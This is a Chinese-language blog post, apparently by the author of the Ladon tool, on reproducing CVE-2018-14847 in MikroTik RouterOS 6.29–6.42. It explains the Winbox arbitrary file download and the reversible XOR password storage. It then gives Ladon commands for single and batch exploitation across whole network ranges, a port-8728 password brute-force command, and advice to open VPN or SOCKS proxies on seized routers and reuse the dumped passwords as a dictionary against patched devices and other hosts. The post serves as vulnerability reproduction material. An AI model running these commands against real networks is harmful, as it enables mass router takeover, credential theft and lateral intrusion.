漏洞复现CVE-2018-14847 Mikrotik RouterOS Exploit

#Ladon 56 个 #漏洞复现 12 个 #EXP 13 个 #指纹识别 5 个 #弱口令扫描 5 个

Ladon 10..4 20230108

Ladon 10.4 2023.1.8[+]CVE-2018-14847  Mikrotik RouterOS 6.29-6.42密码读取WhatCMS更新Oxygen Router  Broadband RouterMikrotik RouterHuawei Router
LadonExp 20230108[+]错误返回头信息如401

漏洞介绍

相关的技术讨论作者在 21 May 2018 日就以文章的形式详细阐述 https://n0p.me/winbox-bug-dissection/  ，漏洞大致是这样的：

Winbox申请登录以后会从RouterOS里面下载一些适用于当前版本的ROS的DLL文件作为Winbox的功能模块来执行，但是这个下载行为没有恰当的鉴权，通过精心构造的请求包，可以下载任意文件，包括RouterOS的用户数据库文件。
   RouterOS的用户数据库存储的密码没有使用标准的加密方式加密，只是把密码原文和 md5(用户名 + “283i4jfkai3389”) 做了一次XOR运算，运算结果完全可逆，几乎可以认为是明文存储了密码，使用LadonGo的CVE-2018-14847 EXP可以直接还原出明文密码，导致路由器沦陷。

影响范围 

6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20)

RouterOS下载

https://download2.mikrotik.com/routeros/6.38.4/mikrotik-6.38.4.iso

Ladon 10.4漏洞复现

首先使用Ladon子模块WhatCms模块识别C段、B段、甚至A段网络设备，如果目标使用mikrotik<=6.42，就可以直接读取用户密码，然后通过web或自带客户端连接路由器，一键开启VPN或Socks代理。

##### 191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42版本密码读取

Ladon 192.168.1.8 CVE-2018-14847Ladon ip.txt CVE-2018-14847

PS：用法与LadonGo一致，就不截图了

LadonGo-单IP利用

Ladon 192.168.1.50 CVE-2018-14847 Ladon CVE-2018-14847 192.168.1.50 Ladon CVE-2018-14847 192.168.1.50 8291

LadonGo-批量利用

Ladon 192.168.1.50/24 CVE-2018-14847 C段 Ladon 192.168.1.50/c CVE-2018-14847 C段 Ladon 192.168.1.50/b CVE-2018-14847 B段 Ladon ip.txt CVE-2018-14847 IP.TXT

RouterOS路由器8728端口密码爆破

Ladon 192.168.1.8/24 RouterOSScan

通过漏洞导出的密码，可以做成字典，拿去跑已修补漏洞的RouterOS高版本，也可以跑其它端口弱口令，获取其它机器权限。

Download

Ladon: https://github.com/k8gege/Ladon/releases
LadonGo: https://github.com/k8gege/LadonGo/releases
http://k8gege.org/p/cve-2018-14847.html
https://k8gege.org/p/LadonGoRosBrute.html